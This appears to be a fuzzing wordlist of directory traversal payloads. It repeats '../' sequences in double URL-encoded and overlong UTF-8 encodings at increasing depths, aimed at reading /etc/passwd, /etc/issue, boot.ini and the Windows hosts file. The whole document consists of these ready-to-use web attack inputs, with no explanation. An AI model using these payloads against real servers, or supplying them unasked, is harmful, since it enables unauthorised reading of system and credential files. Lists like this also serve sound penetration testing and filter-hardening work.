-%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cetc%255cissue -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cboot.ini -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cetc%255cpasswd -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cetc%255cissue -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cboot.ini -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cetc%255cpasswd -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cetc%255cissue -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cboot.ini -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cetc%255cpasswd -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cetc%255cissue -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cboot.ini -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cetc%255cpasswd -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cetc%255cissue -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cboot.ini -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%32%%65%%32%%65%c0%2fetc%c0%2fpasswd -%%32%%65%%32%%65%c0%2fetc%c0%2fissue -%%32%%65%%32%%65%c0%2fboot.ini -%%32%%65%%32%%65%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fetc%c0%2fpasswd -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fetc%c0%2fissue -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fboot.ini -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fetc%c0%2fpasswd -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fetc%c0%2fissue -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fboot.ini -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fetc%c0%2fpasswd -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fetc%c0%2fissue -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fboot.ini -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fetc%c0%2fpasswd -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fetc%c0%2fissue -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fboot.ini -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fetc%c0%2fpasswd -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fetc%c0%2fissue -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fboot.ini -%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2f%%32%%65%%32%%65%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%32%%65%%32%%65%c0%afetc%c0%afpasswd -%%32%%65%%32%%65%c0%afetc%c0%afissue -%%32%%65%%32%%65%c0%afboot.ini -%%32%%65%%32%%65%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afetc%c0%afpasswd -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afetc%c0%afissue -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afboot.ini -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afetc%c0%afpasswd -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afetc%c0%afissue -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afboot.ini -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afetc%c0%afpasswd -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afetc%c0%afissue -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afboot.ini -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afetc%c0%afpasswd -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afetc%c0%afissue -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afboot.ini -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afetc%c0%afpasswd -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afetc%c0%afissue -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afboot.ini -%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%af%%32%%65%%32%%65%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%32%%65%%32%%65%c0%5cetc%c0%5cpasswd -%%32%%65%%32%%65%c0%5cetc%c0%5cissue -%%32%%65%%32%%65%c0%5cboot.ini -%%32%%65%%32%%65%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cetc%c0%5cpasswd -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cetc%c0%5cissue -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cboot.ini -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cetc%c0%5cpasswd -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cetc%c0%5cissue -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cboot.ini -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cetc%c0%5cpasswd -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cetc%c0%5cissue -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cboot.ini -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cetc%c0%5cpasswd -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cetc%c0%5cissue -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cboot.ini -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cetc%c0%5cpasswd -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cetc%c0%5cissue -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cboot.ini -%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%32%%65%%32%%65%c1%9cetc%c1%9cpasswd -%%32%%65%%32%%65%c1%9cetc%c1%9cissue -%%32%%65%%32%%65%c1%9cboot.ini -%%32%%65%%32%%65%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cetc%c1%9cpasswd -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cetc%c1%9cissue -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cboot.ini -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cetc%c1%9cpasswd -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cetc%c1%9cissue -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cboot.ini -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cetc%c1%9cpasswd -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cetc%c1%9cissue -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cboot.ini -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cetc%c1%9cpasswd -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cetc%c1%9cissue -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cboot.ini -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cetc%c1%9cpasswd -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cetc%c1%9cissue -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cboot.ini -%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9c%%32%%65%%32%%65%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%32%%65%%32%%65%c1%pcetc%c1%pcpasswd -%%32%%65%%32%%65%c1%pcetc%c1%pcissue -%%32%%65%%32%%65%c1%pcboot.ini -%%32%%65%%32%%65%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcetc%c1%pcpasswd -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcetc%c1%pcissue -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcboot.ini -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcetc%c1%pcpasswd -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcetc%c1%pcissue -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcboot.ini -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcetc%c1%pcpasswd -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcetc%c1%pcissue -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcboot.ini -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcetc%c1%pcpasswd -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcetc%c1%pcissue -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcboot.ini -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcetc%c1%pcpasswd -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcetc%c1%pcissue -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcboot.ini -%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pc%%32%%65%%32%%65%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%32%%65%%32%%65%c0%9vetc%c0%9vpasswd -%%32%%65%%32%%65%c0%9vetc%c0%9vissue -%%32%%65%%32%%65%c0%9vboot.ini -%%32%%65%%32%%65%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vetc%c0%9vpasswd -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vetc%c0%9vissue -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vboot.ini -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vetc%c0%9vpasswd -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vetc%c0%9vissue -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vboot.ini -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vetc%c0%9vpasswd -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vetc%c0%9vissue -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vboot.ini -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vetc%c0%9vpasswd -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vetc%c0%9vissue -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vboot.ini -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vetc%c0%9vpasswd -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vetc%c0%9vissue -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vboot.ini -%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9v%%32%%65%%32%%65%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%32%%65%%32%%65%c0%qfetc%c0%qfpasswd -%%32%%65%%32%%65%c0%qfetc%c0%qfissue -%%32%%65%%32%%65%c0%qfboot.ini -%%32%%65%%32%%65%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfetc%c0%qfpasswd -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfetc%c0%qfissue -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfboot.ini -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfetc%c0%qfpasswd -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfetc%c0%qfissue -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfboot.ini -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfetc%c0%qfpasswd -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfetc%c0%qfissue -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfboot.ini -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfetc%c0%qfpasswd -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfetc%c0%qfissue -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfboot.ini -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfetc%c0%qfpasswd -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfetc%c0%qfissue -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfboot.ini -%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qf%%32%%65%%32%%65%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%32%%65%%32%%65%c1%8setc%c1%8spasswd -%%32%%65%%32%%65%c1%8setc%c1%8sissue -%%32%%65%%32%%65%c1%8sboot.ini -%%32%%65%%32%%65%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts 